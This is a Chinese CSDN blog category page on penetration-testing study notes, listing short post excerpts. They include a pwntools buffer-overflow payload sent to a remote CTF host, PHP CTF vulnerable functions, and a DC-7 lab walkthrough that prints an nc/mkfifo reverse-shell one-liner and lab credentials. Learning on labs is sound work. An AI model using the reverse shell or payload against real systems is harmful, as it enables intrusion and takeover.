![](https://img-blog.csdnimg.cn/20201014180756724.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透测试
文章平均质量分 81
zx520113
学习是一种快乐!
展开
-
PWN学习记录
PWN运行程序python3,需要安装pwn。from pwn import *p = remote("111.200.241.244",59428)payload = 0x88*'a' + p64(0x400596).decode("iso-8859-1")p.sendline(payload)//发送payloadp.interactive()原创 2021-07-29 16:25:06 · 1868 阅读 · 0 评论 -
CTF之PHP
CTF之PHPPHP环境及基础变量PHP漏洞函数1、sha1 和 md5 函数2、ereg()函数漏洞:00截断2、变量本身的key4、extract()变量覆盖5、strcmp()漏洞6、is_numeric()函数7、preg_match函数漏洞8、parse_str函数漏洞9、字符串比较10、unset()函数漏洞11、intval()函数漏洞12、switch()函数13、in_array()函数14、serialize() 和 unserialize()函数漏洞PHP环境及基础使用phpstu原创 2021-07-26 17:57:58 · 2651 阅读 · 0 评论 -
CTF杂项知识汇总
CTF杂项知识汇总文件类型识别文件类型识别WinHex通过winHex程序可以打开查看文件头类型,根据文件头判断出文件类型,linux下可以使用file 文件名来判断文件类型。常见的文件头类型:|文件类型| 文件头 ||–|--|| | |...原创 2021-07-06 11:02:49 · 2229 阅读 · 0 评论 -
BurpSuite抓包手机模拟器APP
1、BurpSuite配置图2、模拟器配置3、证书下载安装,打开浏览器,出入配置好的IP端口4、进入设置->安全->从SD卡安装证书,找到重命名的证书文件cacert.cer安装5、打开APP或者浏览器测试抓包数据...原创 2020-10-14 10:58:01 · 1187 阅读 · 0 评论 -
虚拟机安装安卓模拟器
1、下载并安装VMare虚拟机,下载安卓版本软件包。相关功能可参考:安装官方VMDK下载:https://www.osboxes.org/android-x86/#android-x86-8-vmware安卓安装软件及命令使用:https://blog.csdn.net/weixin_43913500/article/details/88760557VMDK安装:https://blog.csdn.net/gb4215287/article/details/782457072、VMare原创 2020-09-01 11:57:54 · 7063 阅读 · 0 评论 -
DC-7靶机反弹php shell
在对靶机DC-7进行渗透测试学习时,发现无法使用介绍的方法echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.135 1234 >/tmp/f" >> backups.sh进行反弹shell提权。 前面的步骤与网上介绍的方法一样,这里不做过多阐述。后台账号密码:dc7user/MdR3xOgB7#dW ssh dc7user@192.168.23.142远程...原创 2020-08-28 10:31:08 · 253 阅读 · 0 评论 -
python requests使用
1、最基本的网页响应访问import requests#url为网页地址url="https://www.cnblogs.com/lanyinhao/p/9634742.html"res=requests.get(url=url)print(res.status_code)print(res.text)2、定制header模拟浏览器访问import requestsurl="https://www.cnblogs.com/lanyinhao/p/9634742.html"h原创 2020-09-23 17:13:24 · 242 阅读 · 0 评论 -
PHP中的MySQL命令问题
在mysql下如何查看是否支持文件数据操作呢? show global variables like '%secure%'; 在MySQL目录中找到my.ini文件,打开查看是否有secure_file_priv,用于指定写入读取操作的目录。没有则自己修改添加一下即可。此外,PHP下的MySQL在测试执行时会经常报连接中断,重启一下就好了。[mysql]default-character-set=utf8[mysqld]po...原创 2020-07-01 09:20:20 · 696 阅读 · 0 评论